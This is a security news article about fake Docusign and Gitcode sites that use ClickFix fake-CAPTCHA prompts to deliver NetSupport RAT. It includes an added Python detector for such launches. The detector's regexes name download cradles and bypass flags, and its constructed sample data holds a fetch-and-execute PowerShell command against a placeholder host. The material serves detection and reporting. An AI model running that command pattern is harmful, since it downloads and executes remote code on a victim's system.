- Threat actors are creating fake Docusign and Gitcode websites
- The sites come with a fake CAPTCHA and other scam mechanisms
- Victims are tricked into downloading a Trojan
Security researchers have found fake Gitcode and Docusign websites that distribute remote access Trojan (RAT) malware using the infamous ClickFix method.
DomainTools Investigations (DTI) experts found "malicious multi-stage downloader PowerShell scripts" hosted on counterfeit websites that instruct visitors to open the Windows Run dialog and execute a script that has been copied to their clipboard.
"In doing so, the PowerShell script downloads another downloader script and executes it on the system, which in turn retrieves additional payloads and executes them, eventually installing NetSupport RAT on infected machines," the researchers said in their report. These multiple stages and downloads are designed to evade detection and help the campaign "be more resilient to security research and takedown."
SocGholish
They also said they do not know exactly how victims end up on these websites. However, it is safe to assume that social engineering, spam email and possibly malvertising are part of the methodology. In some cases, the fake websites also come with a fake CAPTCHA verification mechanism that, to "solve" it, requires victims to copy and paste a code into the Run dialog, effectively downloading the malware.
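The telltale of the ClickFix chain described above is a PowerShell process spawned directly from explorer.exe (the Run dialog) whose command line carries a download cradle and hidden-window flags. The following triage script is an added example, not code from the article or from DomainTools; the process-creation records it scores are constructed, and the URL is a placeholder.

```python
"""Heuristic triage of process-creation records for ClickFix-style
'paste into Win+R' PowerShell launches (added example, constructed data)."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str    # parent process image (e.g. from Sysmon Event ID 1 / 4688)
    image: str     # child process image
    cmdline: str   # child command line


# Download cradles and encoded commands typical of staged downloader scripts
DOWNLOAD_CRADLE = re.compile(
    r"(?i)(invoke-webrequest|\biwr\b|downloadstring|invoke-expression|\biex\b"
    r"|frombase64string|-enc(odedcommand)?\b)")
# Flags that hide the console window or bypass the execution policy
STEALTH_FLAGS = re.compile(
    r"(?i)(-w(indowstyle)?\s+hidden|-nop(rofile)?\b|-e(xecutionpolicy|p)\s+bypass)")


def score_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Return (score, reasons); one point per ClickFix indicator present."""
    reasons: list[str] = []
    if not ev.image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return 0, reasons
    # Text pasted into the Run dialog is launched by explorer.exe, not by a
    # shell or scheduler, and never references a script file on disk.
    if ev.parent.lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (Run dialog)")
    if DOWNLOAD_CRADLE.search(ev.cmdline):
        reasons.append("download cradle or encoded command in command line")
    if STEALTH_FLAGS.search(ev.cmdline):
        reasons.append("hidden window / execution policy bypass flags")
    return len(reasons), reasons


def triage(events: list[ProcEvent], threshold: int = 2) -> list[tuple[ProcEvent, list[str]]]:
    """Keep only events that combine at least `threshold` indicators."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample records: one ClickFix-like launch, two benign ones
SAMPLE_EVENTS = [
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              'powershell -w hidden -ep bypass -c "iwr hxxp://PLACEHOLDER.invalid/s2.ps1 | iex"'),
    ProcEvent("C:\\Windows\\System32\\cmd.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -File C:\\scripts\\backup.ps1"),
    ProcEvent("C:\\Windows\\explorer.exe", "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
              "powershell -c Get-Process"),
]
```

Run `triage(SAMPLE_EVENTS)` to see only the first record flagged; the admin who opens PowerShell from the Run dialog to list processes scores a single point and is left alone.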
DTI could not confirm the identity of the attackers, but emphasized that it had observed a similar campaign at the end of 2024 which was attributed to SocGholish:
"In particular, the techniques involved are commonplace and NetSupport Manager is a legitimate administration tool that is known to be leveraged as a RAT by multiple threat groups such as FIN7, Scarlet Goldfinch, Storm-0408 and others," the report concluded.
SocGholish, also known as FakeUpdates, is known for its fake browser and fake software update alerts. After compromising a website, the crooks would inject a pop-up window notifying visitors that their browser or operating system needs a "fix" or an "update".
This is the original ClickFix method, one that evolved from the old "you have a virus" pop-up window that imitated popular antivirus programs and delivered viruses.
Via The Hacker News